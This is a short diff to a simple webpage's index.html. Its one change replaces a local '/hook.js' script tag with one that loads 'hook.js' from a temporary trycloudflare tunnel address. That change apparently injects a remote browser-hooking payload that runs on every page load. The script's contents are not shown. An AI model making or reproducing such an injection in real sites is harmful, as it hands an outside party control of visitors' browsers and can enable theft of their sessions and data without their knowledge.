--- a/index.html
+++ b/index.html
@@ -39,6 +39,6 @@
     <p>&copy; 2025 My Simple Webpage</p>
   </footer>
   
-  <script src="/hook.js"></script>
+  <script src=" https://exports-answering-bench-throat.trycloudflare.com/hook.js "></script>
 </body>
 </html>
